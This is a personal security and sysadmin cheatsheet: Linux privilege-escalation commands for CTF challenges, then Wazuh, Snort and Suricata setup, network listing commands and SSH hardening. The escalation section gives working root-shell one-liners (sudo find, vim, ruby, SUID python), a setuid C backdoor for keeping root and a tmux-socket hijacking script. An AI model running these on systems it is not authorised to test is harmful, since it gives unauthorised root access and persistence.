This is where I will write notes about different topics. Note that information included in this “cheatsheet” could have changed after it was added. I will do my best to keep it updated.

Table of Contents

Privilege Escalation

These commands are useful during CTFs; I have used them before when working on a challenge. Check whatever you find against GTFOBins (gtfobins.github.io), which lists how each binary can be abused under sudo, SUID or capabilities.

Finding SUID Executables

find / -perm -u=s -type f 2>/dev/null

Lists regular files with the setuid bit (mode 4000) set. A setuid binary runs with its owner's privileges, so a root-owned one that can spawn a shell or read arbitrary files is a direct path to root.

  • -perm -u=s : matches files whose setuid bit is set (same as -perm -4000)
  • -type f : only regular files
  • 2>/dev/null : hides the "Permission denied" errors from directories you cannot read

find / -perm -4000 -type f 2>/dev/null

Listing all SUID files with their owner and mode; check GTFOBins (gtfobins.github.io) to see whether any of them can be used to obtain root.

find / -type f -perm -4000 -exec ls -l {} \; 2>/dev/null

More variants of the same search (each line is a separate command). The first line is different: if sudo -l shows that you may run find as root, it is not a search at all but a direct root shell, because find runs /bin/sh with root's privileges and -quit stops after the first match.

sudo find . -exec /bin/sh \; -quit
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -4000 -user root -ls 2>/dev/null
find / -type f -perm -u=s -user root -ls 2>/dev/null

Finding SGID Binaries

This is very similar to finding and abusing SUID binaries. An SGID binary (mode 2000) runs with the group of its owner rather than the user, so a root-group one gives you that group's access, for example to files that are only group-readable.

They too use the find command; -ls prints owner, group and mode for each hit.

find / -type f -perm -2000 2>/dev/null
find / -type f -perm -g=s 2>/dev/null

find / -type f -perm -2000 -user root -ls 2>/dev/null
find / -type f -perm -g=s -user root -ls 2>/dev/null
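As an added example (not from the original page), the script below wraps the searches above in two functions: one lists every setuid or setgid regular file with its mode and owner, the other reports the ones missing from a baseline list you supply, which is how you separate the stock binaries (su, passwd, sudo) from the odd one somebody planted. It assumes GNU find (for -printf); the baseline file name in the usage comment is hypothetical.

```bash
#!/usr/bin/env bash
# Added example: enumerate setuid/setgid files and diff them against a baseline.
# Assumes GNU find (for -printf). On a real box call it with "/" as the root.

# Print "mode owner:group path" for every regular file with the setuid or setgid bit.
# -perm -4000 requires the setuid bit, -perm -2000 the setgid bit; 2>/dev/null drops
# the "Permission denied" noise from directories the current user cannot enter.
list_privileged_bins() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -printf '%#m %u:%g %p\n' 2>/dev/null | sort -k3
}

# Print the privileged files whose path is not in the baseline file ($2, one absolute
# path per line). On a CTF box these are the first candidates to look up on GTFOBins;
# on a production box they are the ones that need an explanation or a chmod u-s.
unexpected_privileged_bins() {
    list_privileged_bins "$1" | while read -r mode owner path; do
        grep -qxF -- "$path" "$2" || printf '%s %s %s\n' "$mode" "$owner" "$path"
    done
}

# Usage on a live system (baseline.txt is a hypothetical list kept from a clean install):
#   unexpected_privileged_bins / /root/baseline.txt
```

The baseline is worth generating right after installing a box and keeping off-host; the diff then shows both new SUID binaries and stock ones whose mode changed.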

Creating Your Own SUID Binary

This needs root already (sudo), so it is a way to keep root access after escalating, not a way to get it. The file must be owned by root for the setuid bit to give root: setuid on a file you own only gives your own uid. The bit is also ignored on filesystems mounted nosuid, which /tmp may be.

printf '#define _GNU_SOURCE\n#include <stdlib.h>\n#include <unistd.h>\nint main(void){setresuid(0,0,0);system("/bin/sh");return 0;}\n' > /tmp/suid.c
gcc -o /tmp/suid /tmp/suid.c
sudo chown root:root /tmp/suid   # owner must be root for setuid to mean root
sudo chmod 4755 /tmp/suid        # setuid bit plus execute for everyone

Using Tools To Get Shell

Using VIM To Get A Shell

If sudo -l shows that vim may be run as root, the :! shell escape gives a root shell:

sudo vim -c '!sh'
sudo -u root vim -c '!sh'

Using Tmux To Get A Shell

In the past I used this to read a file containing the flag that was protected by root. There was a tmux session running that had root access.

First look for tmux processes that root is running. The -S argument (or the path in parentheses on the server process title) is the socket the session lives on:

ps -u root -o pid,args | grep '[t]mux'

Example output:

/usr/bin/tmux -S /.root/vulnerable_session

tmux talks to its server through that socket, so if your user can write to it (check with ls -l; root's default /tmp/tmux-0 directory is mode 700, which is why the example above uses a custom path) attach to it with tmux's -S option (tmux -S <socket> attach). Every command you run inside the attached session runs as root; use the id command to confirm.

The TMUX environment variable (socket path, server pid, session index) is another way to point the tmux client at a foreign socket. It works for listing sessions, but tmux refuses to attach while TMUX is set, so prefer -S for attaching.

export TMUX=/tmp/tmux-1000/default,1234,0
tmux ls

ps aux | grep tmux shows tmux processes of all users, which helps when the session you need belongs to a different non-root user.
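The procedure above, as an added example that is not part of the original page: parse the process list for root's tmux processes, pull out the socket path each one uses, check whether the current user can write to it, and only then attach. It assumes procps ps (the --no-headers flag) and that tmux is installed; the ps lines in the test are constructed.

```bash
#!/usr/bin/env bash
# Added example: locate tmux sockets that belong to root and check whether we can attach.

# Read "USER ARGS..." lines (as produced by: ps -eo user:32,args --no-headers) and print
# the socket path of every tmux process owned by root. The path comes from -S when the
# process was started with one; the tmux server also puts its socket path in parentheses
# in its process title ("tmux: server (/tmp/tmux-0/default)"); otherwise root's default
# socket /tmp/tmux-0/default is assumed.
tmux_sockets_from_ps() {
    awk '$1 == "root" && $2 ~ /(^|\/)tmux:?$/ {
        sock = "/tmp/tmux-0/default"
        for (i = 3; i <= NF; i++) {
            if ($i == "-S" && i < NF) sock = $(i + 1)
            else if ($i ~ /^\(\/.*\)$/) sock = substr($i, 2, length($i) - 2)
        }
        print sock
    }'
}

# Return 0 when the path is a socket the current user may write to, which is what tmux
# needs to attach; root's /tmp/tmux-0 is mode 0700, so this usually fails unless the
# socket was created somewhere world-accessible (the CTF misconfiguration).
tmux_socket_attachable() {
    [ -S "$1" ] && [ -w "$1" ]
}

# Try every root socket; the first attachable one gives a shell inside a root session.
attach_root_tmux() {
    ps -eo user:32,args --no-headers | tmux_sockets_from_ps | sort -u | while read -r sock; do
        if tmux_socket_attachable "$sock"; then
            echo "attaching to $sock"
            tmux -S "$sock" attach
            break
        else
            echo "cannot use $sock (not writable or not a socket)"
        fi
    done
}
```

Run attach_root_tmux from a normal user shell; if every socket is reported as not writable there is nothing to abuse here and the tmux lead is a dead end.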

Using Python To Escalate Privilege

If a python binary is SUID root (it shows up in the find output above), exec a shell with -p so it keeps the effective uid instead of dropping it:

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Using Ruby To Escalate Privilege

First use find to check whether a Ruby interpreter has the setuid bit set.

find / -perm -u=s -type f 2>/dev/null | grep ruby

If it does, set the uid to 0 from Ruby and exec a shell.

/usr/bin/ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"'

Another way of abusing Ruby is through sudo. Run sudo -l and look for a line like the following:

(root) NOPASSWD: /usr/bin/ruby

If it is there, this command gives a root shell.

sudo ruby -e 'exec "/bin/bash"'

Wazuh

File Locations

Windows

  Path                                                                     Description
  C:\Program Files (x86)\ossec-agent\ossec.conf                            agent config file
  C:\Program Files (x86)\ossec-agent\ossec.log                             agent log
  C:\Program Files (x86)\ossec-agent\active-response\active-responses.log  active response log

Linux

  Path                                       Description
  /var/ossec/etc/ossec.conf                  config file (agent or manager)
  /var/ossec/logs/ossec.log                  agent/manager log
  /var/ossec/logs/alerts/alerts.log          alerts generated by the manager (plain text); manager only
  /var/ossec/logs/alerts/alerts.json         the same alerts in JSON; manager only
  /var/ossec/logs/active-responses.log       active response log
  /var/ossec/active-response/bin             where active response scripts or executables go
  /var/ossec/ruleset/rules/                  default rules (replaced on upgrade, do not edit)
  /var/ossec/etc/rules/local_rules.xml       custom rules (manager)

Mac

  Path                                       Description
  /Library/Ossec/etc/ossec.conf              config file
  /Library/Ossec/logs/active-responses.log   active response log

Downloading Wazuh Password Tool

The version in the URL (4.14 here) should match the installed Wazuh version.

curl -sO https://packages.wazuh.com/4.14/wazuh-passwords-tool.sh

Windows Manipulating Wazuh Services

The agent installs a service named WazuhSvc (display name "Wazuh"). All of the commands below need an elevated (Administrator) prompt.

Windows Start Wazuh Service

NET START WazuhSvc

Restarting Agent On Windows (powershell)

Restart-Service -Name WazuhSvc

Check Wazuh Status Windows (powershell)

Get-Service -Name WazuhSvc

Stopping Wazuh Service On Windows

Stop-Service -Name WazuhSvc

Finding Wazuh Services Using Windows Services Manager

First Type services into the search bar in the lower left corner of Windows. Another option to get to the same menu is to press Win + R then type services.msc and press enter.

Now locate any services that have the word wazuh or wazuhSvc.

Now right click the service and select your option.

Agents

Upgrading Manager & Agents

The following command lists the agents whose version is older than the manager's, i.e. the ones that can be upgraded.

sudo /var/ossec/bin/agent_upgrade -l

Next, upgrade a specific agent by its ID (the manager pushes the new package to the agent).

sudo /var/ossec/bin/agent_upgrade -a 003

In the example above we upgraded the agent with the ID 003.

Create An New Agent Group

The command below will create a new agent group with the name of Suricata.

sudo /var/ossec/bin/agent_groups -a -g Suricata -q

List All The Agents

sudo /var/ossec/bin/manage_agents -l

Adding An Agent ID To A Group

Use the manage_agents -l command above to find the ID of the agent you want to add. The group must already exist: create it with sudo /var/ossec/bin/agent_groups -a -g <Group Name> -q BEFORE adding an agent to it.

sudo /var/ossec/bin/agent_groups -a -i <AGENT_ID> -g <Group Name> -q

Checking If Everything Is Up

Uses nc to test a TCP connection to the ports the manager exposes:

  • 1514 : agent communication (events)
  • 1515 : agent enrollment
  • 55000 : the manager's REST API

Replace <ip> with the IP of the Wazuh manager (server). The dashboard itself listens on 443, so check that port if you want to test the dashboard instead.

sudo nc -zv <ip> 1514 1515 55000

If the ports are open it prints something like the following; a timeout or "Connection refused" means the service is down or a firewall is in the way:

Connection to <ip> 1514 port [tcp/*] succeeded!
Connection to <ip> 1515 port [tcp/*] succeeded!
Connection to <ip> 55000 port [tcp/*] succeeded!

Upgrading With only-upgrade

Run apt-get update first so the new packages are visible. Wazuh's upgrade guide does the components in this order: indexer, then manager, then dashboard.

Upgrading Dashboard

sudo apt-get install --only-upgrade wazuh-dashboard

Updating Manager

sudo apt-get install --only-upgrade wazuh-manager

Updating Indexer

sudo apt-get install --only-upgrade wazuh-indexer

Linux Manipulating Wazuh Services

This lists all service units and uses grep to keep only the ones related to Wazuh.

sudo systemctl list-units --type=service --all | grep wazuh

Restarting Wazuh-Manager service

sudo systemctl restart wazuh-manager

Restarting wazuh-agent service

sudo systemctl restart wazuh-agent

Install Wazuh-agent and Setting WAZUH_MANAGER

You must change 10.0.0.2 to the IP (or hostname) of the Wazuh manager; the installer writes it into the agent's ossec.conf so the agent connects there. Run it as root, with the Wazuh apt repository already configured.

WAZUH_MANAGER="10.0.0.2" apt-get install wazuh-agent

Example of Adding Log Support

This shows how to make the agent read an extra log file. In this example we are adding the Suricata EVE log: add the block to /var/ossec/etc/ossec.conf on the host that runs Suricata, then restart the wazuh-agent service.

<localfile>
    <log_format>json</log_format>
    <location>/var/log/suricata/eve.json</location>
</localfile>

Bash Script To Start Wazuh Services

This can be used on Linux systems to start the SSH daemon and the three Wazuh services if any of them is not active.

#!/usr/bin/env bash
# Start sshd and the Wazuh services when they are not active.

function check_ssh () {
        echo "Checking SSH...."
        # systemctl is-active prints active, inactive, failed or unknown
        check_status="$(systemctl is-active ssh)"
        if [ "$check_status" = "active" ]; then
                echo -e "\e[1;32mSSH is active... Exiting.... \n\n\e[0m\n"
        else
                echo -e "\e[31mSSH is not running... Starting now... \n\n\n\e[0m"
                # the SSH service is not active so we start it
                sudo systemctl start ssh
        fi
}

function wazuh () {
        # array with the three Wazuh unit names
        wazuh_services_name=("wazuh-dashboard.service" "wazuh-indexer.service" "wazuh-manager.service")
        for i in "${wazuh_services_name[@]}"
        do
                # anything other than "active" (inactive, failed, unknown) gets a start attempt
                check_status="$(systemctl is-active "$i")"
                if [ "$check_status" != "active" ]; then
                        echo -e "\e[31m$i is $check_status \n\n\n\e[0m\n"
                        echo -e "Starting $i... \n\n\n"
                        # start the unit that was detected as not active
                        sudo systemctl start "$i"
                else
                        # the service is active
                        echo -e "\e[1;32m$i is $check_status \n\n\n\e[0m\n"
                fi
        done
}


check_ssh

wazuh

Uninstall Wazuh Bash Script

This script removes the Wazuh dashboard, manager, indexer and Filebeat together with their data directories, so you can start fresh after something breaks. Run it as root. Every rm -rf below is permanent and also deletes indexed alerts, so check the paths before running it on anything but a test box.

#!/usr/bin/env bash

echo "[================================PURGE wazuh-dashboard=======================================]"

apt-get remove --purge wazuh-dashboard -y
rm -rf /usr/share/wazuh-dashboard /etc/wazuh-dashboard /var/lib/wazuh-dashboard
# only needed when a half-removed package has left dpkg in a broken state
rm -rf /var/lib/dpkg/info/wazuh-*
rm -rf /var/log/wazuh-dashboard
deluser wazuh-dashboard
delgroup wazuh-dashboard
apt-get update

echo "[=================================PURGE wazuh-manager========================================]"

apt-get remove --purge wazuh-manager -y
rm -rf /var/ossec/

echo "[====================================PURGE filebeat==========================================]"

apt-get remove --purge filebeat -y
rm -rf /var/lib/filebeat/
rm -rf /usr/share/filebeat/
rm -rf /etc/filebeat/

echo "[===================================PURGE wazuh-indexer======================================]"

apt-get remove --purge wazuh-indexer -y
rm -rf /var/lib/wazuh-indexer/
rm -rf /usr/share/wazuh-indexer/
rm -rf /etc/wazuh-indexer/

echo "[=====================================UPDATE=================================================]"
apt-get update

Issues And Solutions

API id [default]: 3099 – ERROR3099 – Invalid credentials

The dashboard logs in to the manager API with the credentials stored in /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml (the hosts section, user wazuh-wui). This error means the password in that file no longer matches the API user's password, which happens after the API password has been changed or reset.

Edit the password in wazuh.yml so that it matches the wazuh-wui API user (if that user still has its default password, that is wazuh-wui), then restart the wazuh-dashboard service.

The username should stay wazuh-wui.

ERROR: (4112): Invalid server address found: ‘MANAGER_IP’

The agent was installed without WAZUH_MANAGER being set. Edit the /var/ossec/etc/ossec.conf file and replace MANAGER_IP with the IP (or hostname) of the manager.

<server>
   <address>MANAGER_IP</address>
   <port>1514</port>
   <protocol>tcp</protocol>
</server>

After making the change restart the wazuh-agent service using the command below.

sudo systemctl restart wazuh-agent

Resetting Wazuh password

Rules for the new password (the tool rejects anything else):

  • it cannot contain !
  • it must be between 8 and 64 characters long and contain at least one upper case letter, one lower case letter, a number and one of the symbols .*+?-

-u is the user to change (admin is the indexer's admin user) and -p the new password. Run the tool on the node that runs the indexer so it can also update the stored credentials of the other components.

sudo ./wazuh-passwords-tool.sh -u admin -p <password>

Searching for Suricata Groups

This can be typed into the search bar of the Wazuh dashboard to filter alerts by rule group, in this case the group named suricata.

rule.groups:suricata

Snort

Snort is an open source IDS/IPS. It has several useful features, such as:

  • sniffer
  • packet logger
  • IDS
  • IPS
  • real-time monitoring
  • threat detection
  • Pcap File creating

Installing Snort Using APT

The commands below first update and upgrade the machine, then install snort with apt (Debian and Ubuntu ship the Snort 2.9 series). The -y argument answers apt's prompts so it runs without user input.

sudo apt update && sudo apt upgrade -y
sudo apt install snort -y

File Locations

Linux

  Path                              Description
  /etc/snort/snort.conf             config file
  /var/log/snort                    logs and alerts
  /etc/snort/rules/local.rules      custom rules
  /etc/snort/rules                  rules directory

Windows

  Path                              Description
  C:\Snort\etc\snort.conf           config file
  C:\Snort\rules                    rules directory
  C:\Snort\bin\snort.exe            Snort executable

Mac

  Path                              Description
  /etc/snort/snort.conf             config file
  /usr/local/etc/snort/snort.conf   config file (alternative location)
  /usr/local/bin/snort              binary
  /usr/local/etc/snort/rules/       rules directory

Adding Snort To Wazuh’s Configuration

To feed Snort's alerts to the Wazuh manager, add the following to /var/ossec/etc/ossec.conf on the host running Snort (agent or manager) and restart the wazuh-agent or wazuh-manager service. The log_format must match the alert format Snort writes: snort-fast for fast-mode alerts (as in the file name below) and snort-full for the multi-line full alerts written to /var/log/snort/alert.

<localfile>
  <log_format>snort-fast</log_format>
  <location>/var/log/snort/snort.alert.fast</location>
</localfile>

The <location> tag can be changed to whatever file Snort is writing its alerts to.

Commands

Running Snort With eth0 interface

The -c argument is followed by the location of the snort.conf file. The -i argument tells snort to listen to the eth0 interface.

snort -c /etc/snort/snort.conf -i eth0

Display The Alerts On The Console

  • The -c argument gives the config file (and therefore the rules) used for matching.
  • -A selects the alert mode; console prints each alert to the terminal in fast format instead of writing it to the log directory. Add -i <interface> to choose the interface.
sudo snort -c /etc/snort/snort.conf -A console

Logging Traffic Into PCAP File

  • The -b argument logs packets in tcpdump (pcap) format.
  • The -L argument sets the name of that binary log file, written under the log directory (/var/log/snort by default, or the directory given with -l).
snort -b -L packets.pcap

Running Snort In Daemon mode

The -D argument runs Snort as a daemon in the background, so you can close the terminal and it keeps running. Alerts go to /var/log/snort/alert by default; the directory can be changed with -l.

sudo snort -c /etc/snort/snort.conf -D

Reading Generated Logs

The -r argument reads packets from the given pcap file instead of an interface, which is also how you replay a capture through the rules.

sudo snort -r <log file>

Config File Tester

-T parses the config and rules, reports errors and exits without capturing. Use /etc/snort/snort.conf for an apt install; the path below is for a source install.

snort -T -c /usr/local/etc/snort/snort.conf

Suricata

Files Location

  Path                                 Description
  /etc/suricata/suricata.yaml          config file
  /var/lib/suricata/rules              rules written by suricata-update (suricata.rules)
  /var/log/suricata/eve.json           main event log (JSON)
  /var/log/suricata/fast.log           alert log (one line per alert)
  /var/log/suricata/stats.log          engine statistics
  /var/log/suricata/suricata.log       start-up and engine log
  /var/log/suricata/filestore          extracted files
  /etc/suricata/rules/                 static or distribution-provided rules
  /usr/share/suricata/rules/           read-only rules shipped with the package
  /etc/suricata/rules/local.rules      user-created rules

Installing Suricata Using APT

This will be used to install Suricata on a system.

sudo add-apt-repository ppa:oisf/suricata-stable
sudo apt-get update
sudo apt-get install suricata -y

Download rules from emergingthreats.net

The version in the URL (suricata-6.0.8 here) should match the Suricata version you run (suricata -V), since rule keywords differ between releases; suricata-update below picks the right one for you.

cd /tmp/ && curl -LO https://rules.emergingthreats.net/open/suricata-6.0.8/emerging.rules.tar.gz

Suricata’s Commands

More commands and arguments are documented in the Suricata manual.

Updating Suricata

This downloads the Emerging Threats Open ruleset and writes the merged rules to /var/lib/suricata/rules/suricata.rules.

It also updates the rules, so if rules were added upstream they are added to the current set. This command should be run frequently (a daily cron job is typical), followed by a reload or restart of Suricata.

sudo suricata-update

Running Suricata With Config & Rules

-s adds the given rule file on top of the rule files listed in suricata.yaml (-S would use it exclusively).

sudo suricata -c /etc/suricata/suricata.yaml -i eth0 -s /etc/suricata/rules/local.rules

Test Configuration File

-T loads the config and rules, reports errors and exits; run it after editing suricata.yaml or local.rules and before restarting the service.

suricata -T -c /etc/suricata/suricata.yaml

Restart Suricata Service

sudo systemctl restart suricata

Live View Of Fast Log Using tail

tail -f /var/log/suricata/fast.log
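Watching the raw fast.log quickly becomes noise, so here is an added example (not from the original page) of two shell functions that summarise it: one counts alerts per signature with their priority, the other counts source addresses, so you can pipe either a file or tail -f output into them. Suricata's fast.log and Snort's -A fast share this one-line format. The log lines in the test are constructed; IPv6 addresses without brackets are not handled.

```bash
#!/usr/bin/env bash
# Added example: summarise fast.log alerts (Suricata or Snort fast format).
# Line shape: <ts>  [**] [gid:sid:rev] <msg> [**] [Classification: ...] [Priority: N] {PROTO} src:port -> dst:port
# Splitting on " [**] " gives: $1 timestamp, $2 "[gid:sid:rev] msg", $3 the rest.

# Print "count<TAB>priority<TAB>[gid:sid:rev] msg", most frequent first.
fast_log_top_signatures() {
    awk -F ' \\[\\*\\*\\] ' 'NF >= 3 {
        pri = "?"
        if (match($3, /Priority: [0-9]+/)) pri = substr($3, RSTART + 10, RLENGTH - 10)
        n[pri "\t" $2]++
    }
    END { for (k in n) print n[k] "\t" k }' | sort -rn
}

# Print "count<TAB>source IP", most frequent first (port stripped from the src:port field).
fast_log_top_sources() {
    awk -F ' \\[\\*\\*\\] ' 'NF >= 3 {
        if (match($3, /\} [^ ]+ -> /)) {
            src = substr($3, RSTART + 2, RLENGTH - 6)   # drop "} " and " -> "
            sub(/:[0-9]+$/, "", src)                    # drop the port
            n[src]++
        }
    }
    END { for (k in n) print n[k] "\t" k }' | sort -rn
}

# Usage: fast_log_top_signatures < /var/log/suricata/fast.log | head
#        tail -f /var/log/suricata/fast.log | fast_log_top_sources   (Ctrl-C to print)
```

With tail -f the summary only appears when the pipeline ends, since awk prints in END; for a rolling view, feed it a time window instead (for example the last few thousand lines with tail -n).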

Aliases & Bashrc

Used in the .bashrc file. Don’t forget to use source .bashrc after editing the file.

Git Aliases

alias gs='git status'
alias ga='git add'
alias gc='git commit -m'
alias gp='git pull'

CD-ing Into Suricata Folder

alias rules='cd /var/lib/suricata/rules'

Disabling Ruby’s Warnings

-W0 silences Ruby's warnings (deprecation notices and the like) for every ruby process started from this shell.

export RUBYOPT='-W0'

CD-ing Into Suricata Logs

alias slog='cd /var/log/suricata'

Windows Open Connections

Netstat

Run from an elevated (Administrator) prompt; -b needs it.

netstat -abno

  Argument   Description
  -a         all connections and listening ports
  -b         the executable that created each connection or listening port
  -n         addresses and ports as numbers (no DNS lookups)
  -o         the owning process ID

Linux Open Connections

Netstat – Getting Open Ports

  Argument   Description
  -l         listening sockets only
  -n         numeric addresses and ports (no name resolution)
  -t         TCP
  -u         UDP

netstat -lntu

SS Command – Get Open Connections

ss is the modern replacement for netstat. -a adds established sockets to the listening ones; drop it to see listeners only. Add -p (as root) to see the owning process.

  Argument   Description
  -l         listening sockets only
  -n         numeric addresses and ports
  -t         TCP
  -u         UDP
  -a         all sockets, listening and established

ss -lntua

Lsof Command – Find listening ports

sudo lsof -i -P -n | grep LISTEN
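The listing commands above show every socket; the security question is which listeners are bound to all interfaces and therefore reachable from the network. As an added example (not from the original page), the function below reads ss -lntu output and prints only the listeners bound to 0.0.0.0, *, or [::]; the ss output in the test is constructed.

```bash
#!/usr/bin/env bash
# Added example: from "ss -lntu" output, print the listeners exposed on all interfaces.
# Column 5 of ss is "Local Address:Port"; the port is everything after the last colon,
# which also works for IPv6 forms such as "[::]:80".

exposed_listeners() {
    awk '$1 == "Netid" { next }                         # skip the header line
         {
             n = split($5, a, ":")
             port = a[n]
             addr = substr($5, 1, length($5) - length(port) - 1)
             sub(/%.*/, "", addr)                        # drop an interface scope like 127.0.0.53%lo
             if (addr == "0.0.0.0" || addr == "*" || addr == "[::]" || addr == "::")
                 print $1, port, addr
         }'
}

# Usage: ss -lntu | exposed_listeners
#        sudo ss -lntup | exposed_listeners   (adds the process column; it does not shift column 5)
```

Anything this prints that is not meant to be public (a database on 0.0.0.0, a debug port) should be bound to 127.0.0.1 in its own config or blocked with the ufw rules further down.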

SSH

Using systemctl to see if SSH Service is Active

With --quiet it prints nothing and only sets the exit status (0 when the unit is active), which is what you want in scripts. Remove the --quiet argument to have it print the word active (or inactive, failed, unknown).

systemctl is-active --quiet ssh

Creating SSH Keys

Password authentication on an internet-facing SSH server is a brute-force target: there are threat actors scanning the internet and trying passwords against any server with SSH open to the public. Key-based authentication removes that attack, and you can go further and require BOTH the password and the correct key to access the server (see the sshd section below).

Key authentication uses a key pair: the private key stays on your local host and is never copied anywhere; the public key goes into authorized_keys on the server or remote machine.

First run the following command on your host computer, not on the server, to generate a key pair. ssh-keygen takes its randomness from the operating system, so there is nothing to do but answer the prompts; give the key a passphrase so a stolen private key is not immediately usable.

ssh-keygen

By default this creates the directory ~/.ssh and the key pair inside it; the private key is

/home/your_username/.ssh/id_rsa

(or id_ed25519 on OpenSSH 9.5 and newer, where Ed25519 is the default type) and the public key has the same name with a .pub suffix.

Next copy your public key to the server you want to connect to. ssh-copy-id appends it to ~/.ssh/authorized_keys on the remote host and sets the permissions.

ssh-copy-id username@remote_host

If you do not have the ssh-copy-id program you can use the following command (adjust the file name if you generated a different key type). The chmod calls matter: sshd refuses keys from a .ssh directory or authorized_keys file that other users can write to.

cat ~/.ssh/id_rsa.pub | ssh username@remote_host "mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys"

Enabling Key Authentication with SSHD

This is where you edit the file on the remote server.

Use your favorite text editor to edit the following file (it is root-owned, so use sudo).

/etc/ssh/sshd_config

Make sure these two lines are present and uncommented (remove the # ). Both are already the defaults, so on most systems this only confirms that nothing has disabled them:

PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys

To require the key AND the password, as recommended above, add AuthenticationMethods publickey,password. To go key-only instead, set PasswordAuthentication no. Note that sshd uses the first value it reads for a keyword, and on Debian and Ubuntu an Include of /etc/ssh/sshd_config.d/*.conf sits at the top of the file, so a setting in that directory wins over one further down.

Now restart the SSH service (commands in the next section) for the change to take effect. Keep your current session open and test the new login from a second terminal first, so a typo in the config does not lock you out.

Changing The Port To A Non Standard Port

SSH normally listens on TCP port 22. Moving it does not stop a targeted attacker (a port scan finds it in seconds) but it cuts most of the automated brute-force noise out of your logs. This guide sets SSH up on a port other than 22.

This guide assumes you are using OpenSSH's sshd. First use your favorite text editor to edit the following file.

/etc/ssh/sshd_config

Next find the line in the config file that reads #Port 22.

Remove the comment ( # ) from the line and change 22 to the port you want the SSH service to listen on. Save and exit your text editor. Open the new port in the firewall (see the ufw commands below) before restarting, and remember to pass -p <port> when connecting.

The last step is to restart the SSHD service. The unit is called ssh on Debian and Ubuntu and sshd on RHEL-style systems, so one of the following will work:

sudo service sshd restart

sudo systemctl restart ssh
sudo systemctl restart sshd
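Before restarting sshd it helps to know which values it will actually use, because a commented-out line, a duplicate further down, or a file pulled in by Include can leave a different setting in force than the one you just edited. As an added example (not from the original page), the function below mimics sshd's first-match rule for the global section of a config file; the config in the test is constructed and sshd_auth_summary is a hypothetical helper name.

```bash
#!/usr/bin/env bash
# Added example: read the value sshd will use for a keyword from an sshd_config file.
# sshd keeps the FIRST value it reads for a keyword, ignores comment lines, and falls
# back to a built-in default; everything after a Match line is conditional and not global.
# This does not follow Include directives; for the authoritative answer run: sudo sshd -T

sshd_effective() {   # $1 config file, $2 keyword, $3 built-in default
    awk -v key="$2" -v def="$3" '
        /^[[:space:]]*#/ || NF < 2 { next }                 # skip comments and blank lines
        $1 == "Match" { exit }                              # end of the global section
        tolower($1) == tolower(key) { print $2; found = 1; exit }
        END { if (!found) print def }' "$1"
}

# One line with the settings that matter for the key-based setup described above.
# Defaults are OpenSSH's: Port 22, pubkey on, passwords on, root may log in with a key only.
sshd_auth_summary() {   # $1 config file
    printf 'Port=%s PubkeyAuthentication=%s PasswordAuthentication=%s PermitRootLogin=%s\n' \
        "$(sshd_effective "$1" Port 22)" \
        "$(sshd_effective "$1" PubkeyAuthentication yes)" \
        "$(sshd_effective "$1" PasswordAuthentication yes)" \
        "$(sshd_effective "$1" PermitRootLogin prohibit-password)"
}

# Usage: sshd_auth_summary /etc/ssh/sshd_config
```

If the summary still shows PasswordAuthentication=yes after you set it to no, look in /etc/ssh/sshd_config.d/ for a file that sets it first.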

Opening Ports On Linux

ufw is a front end for the kernel firewall; once enabled it denies new incoming connections by default. On a remote host add the SSH rule FIRST and enable ufw second, otherwise you lock yourself out of new SSH connections.

Enable ufw

sudo ufw enable

Open By Service

sudo ufw allow ssh

Open By Protocol & Port

sudo ufw allow 22/tcp

Open By Port

sudo ufw allow 22

Checking The Status Of Ports

sudo ufw status

Allow SSH Connections From IP Range

This adds extra security: only hosts in the given subnet can reach port 22. The 192.168.0.0/24 can be changed to a single public or private IP or to another range. If these hosts are the only ones that should get in, also delete the broad allow rules above, since ufw accepts a connection as soon as any rule matches.

sudo ufw allow from 192.168.0.0/24 to any port 22

Troubleshooting SSH

This part of the cheatsheet has tips, tricks and ways of doing basic troubleshooting of an SSH problem.


Common Problems With Permissions

These are some common errors or problems I have faced before. sshd checks permissions on the server side (StrictModes, on by default): if your home directory, ~/.ssh or authorized_keys is writable by other users, it ignores your key (logging "bad ownership or modes" on the server) and falls back to asking for a password.

ssh-copy-id normally creates ~/.ssh on the server with the correct mode. If it is missing or has the wrong mode for whatever reason, create it and set the permissions with the commands below (the directory must be 700, authorized_keys 600).

mkdir -m 700 ~/.ssh
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys

ssh-copy-id (or the cat | ssh one-liner above) creates ~/.ssh/authorized_keys, the file that stores the public keys allowed to log in; ssh-keygen only creates the key pair on your own machine. If the file exists but has the wrong mode or owner, fix both. Change username to your username; the chown matters because sshd also rejects an authorized_keys file owned by a different user.

chmod 600 ~/.ssh/authorized_keys
chown username:username ~/.ssh/authorized_keys

We used chmod to make sure the file has the correct permissions and chown to make sure it belongs to the user logging in. On the client side the private key must be mode 600, or ssh refuses to use it ("UNPROTECTED PRIVATE KEY FILE").
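Checking these modes by hand is error-prone, so as an added example (not from the original page) the function below audits a home directory for the conditions sshd's StrictModes and the ssh client reject: a group- or world-writable home, a .ssh directory that is not 700, a writable authorized_keys and a private key readable by others. It assumes GNU find; the home directory in the test is constructed.

```bash
#!/usr/bin/env bash
# Added example: report ssh-related files whose permissions sshd or ssh will reject.
# Assumes GNU find (-perm /mode and -printf).

ssh_perm_problems() {   # $1 home directory
    local home=$1 d=$1/.ssh
    # sshd StrictModes: the home directory and .ssh must not be writable by group or others
    [ -d "$home" ] && find "$home" -maxdepth 0 -perm /022 -printf 'home dir %p is group/world-writable (%#m)\n'
    [ -d "$d" ] && find "$d" -maxdepth 0 ! -perm 700 -printf '%p should be 0700 (is %#m)\n'
    # authorized_keys may be 644, but never writable by anyone but the owner
    [ -f "$d/authorized_keys" ] && find "$d/authorized_keys" -perm /022 -printf '%p is group/world-writable (%#m)\n'
    # client side: a private key readable by others is refused outright
    find "$d" -maxdepth 1 -type f -name 'id_*' ! -name '*.pub' -perm /077 \
        -printf 'private key %p readable by others (%#m)\n' 2>/dev/null
    return 0
}

# Usage: ssh_perm_problems "$HOME"      (no output means nothing to fix)
```

Run it on both ends: on the server for the account you log in as, on the client for the account holding the private key.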

Connection Timed Out

